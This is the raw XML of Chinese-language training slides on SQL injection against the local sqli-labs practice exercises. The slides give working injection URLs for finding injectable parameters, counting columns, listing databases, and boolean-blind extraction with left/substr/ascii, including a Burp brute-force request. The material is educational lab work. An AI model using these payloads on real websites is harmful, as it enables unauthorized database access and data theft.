          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>补充知识</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>知识补充</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BBB27A0-523D-4602-B6D9-68DF54460C7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>语句中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>asc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>是指定列按升序排列，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>desc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>则是指定列按降序排列。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>select * from users order by 1 desc;  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>使用降序进行排列</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>select * from users order by 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>asc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>;  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>使用升序进行排列</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14224489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endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31019190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1DBCC-F9F1-4BCB-AC75-93B6A8F73C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53F920-4108-4E5E-AC1B-36A9F2C895D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35959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6B6DB-07CD-42FB-B67C-999AA00FEC8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5B02B6-F7B3-472C-B295-0C7A361EA8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582420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29074-F951-4F17-BDA3-28CB3C928B2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9D51EC-B8B8-4DCF-83D1-9CFB0849311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3095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25581"/>
            <a:ext cx="10131425" cy="318655"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Less-3</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/Less-3/?id=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>查看是否有注入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>2. http://127.0.0.1/sqli/Less-3/?id=1') order by 3--+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>查看有多少列</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>3. http://127.0.0.1/sqli/Less-3/?id=-1')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6. http://127.0.0.1/sqli/Less-3/?id=-1')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19843672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7D61F-3790-4A6E-806B-1DB9F5C29E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A0ED31-F738-4643-A5BD-80293175FF8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660125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7339D-E72F-454D-9A3F-F4EB24ACCE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86CF2D-8E5E-48EE-87A2-D8D00D1A59D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530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51616" y="325581"/>
            <a:ext cx="10131425" cy="318655"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Less-4</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http://127.0.0.1/sqli/Less-4/?id=1"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>查看是否有注入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>2. http://127.0.0.1/sqli/Less-4/?id=1”) order by 3--+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>查看有多少列</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>3. http://127.0.0.1/sqli/Less-4/?id=-1")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查看所有数据库</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>6. http://127.0.0.1/sqli/Less-4/?id=-1")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http://127.0.0.1/sqli/Less-4/?id=-1")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http://127.0.0.1/sqli/Less-4/?id=-1")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365867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55E5-9470-4AE6-8061-116C9A0D1FDF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1960420" y="347417"/>
            <a:ext cx="10131425" cy="303747"/>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6D1CA6E-6503-4086-A431-31ECD5ECA319}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="249382" y="845127"/>
            <a:ext cx="11693236" cy="5860473"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>1. left()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>函数：  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>left(database(),1)=‘s’                     left(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>a,b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>从左侧截取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>的前</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>位，正确则返回</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>，错误则返回</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>regexp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>函数：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>select user() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>regexp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> ‘r’                 user()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>的结果是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>regexp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>为匹配</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>的正则表达式</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>3. like</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>函数： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>select user() like ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>ro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>%’                        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>匹配与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>regexp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>相似。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>substr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>a,b,c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>)   select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>substr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>() XXXX                       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>substr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>a,b,c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>从位置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>开始，截取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>字符串</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>位长度</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>5. ascii()  								    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>将某个字符串转化为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>ascii</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>值</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>6. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>chr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>数字</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>)   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>或者是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>ord</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>(‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>字母</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>’)    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>python</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>中的两个函数可以判断当前的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>ascii</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>值是多少</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>对于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>数据库：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> select left(database(),1)=‘s’;   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>前</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>位是否是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> select database() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>regexp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> ‘s’;  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>匹配第一个字符是否是 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> select database() like ‘s%’;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database()),1,1)='s’;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database()),1,3)= ‘sec’; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>匹配前三个个字符是否是 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>sec</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>  select ascii(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>substr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>((select database()),1,1));    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>直接回显</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>115  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>或者是：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> select ascii(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>substr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>((select database()),1,1)) &gt; 110;  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>如果大于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>110</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>，就会返回</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>，否则返回</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>0.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="294550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04799"/>
            <a:ext cx="10131425" cy="318655"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Less-5 bool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-1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1565564"/>
            <a:ext cx="11596254" cy="4447309"/>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/Less-5/?id=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>’  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>查看是否有注入   </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>2. http://127.0.0.1/sqli/Less-5/?id=1' order by 3--+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>查看有多少列</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>3. http://127.0.0.1/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>sqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>/Less-5/?id=1‘ and left((select database()),1)=’s’--+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>判断第一位是否是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>，然后使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>bp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>进行爆破处理：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>    GET /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>sqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>/Less-5/?id=1%27%20and%20left((select%20database()),2)=%27s§a§%27--+ HTTP/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>通过返回的长度来确定第二位是多少，最后确定为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>，依次类推进行测试。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>4.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t> 或者是使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>来进行判断测试： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>http://127.0.0.1/sqli/Less-5/?id=1‘ and  ascii(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>substr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>((select database()),1,1))&gt;156--+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>（此时是没有返回的） （这种方法是错误的）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>http://127.0.0.1/sqli/Less-5/?id=1‘ and  ascii(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>substr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>((select database()),1,1))&gt;110--+  </a:t>
            </a:r>
            <a:r>
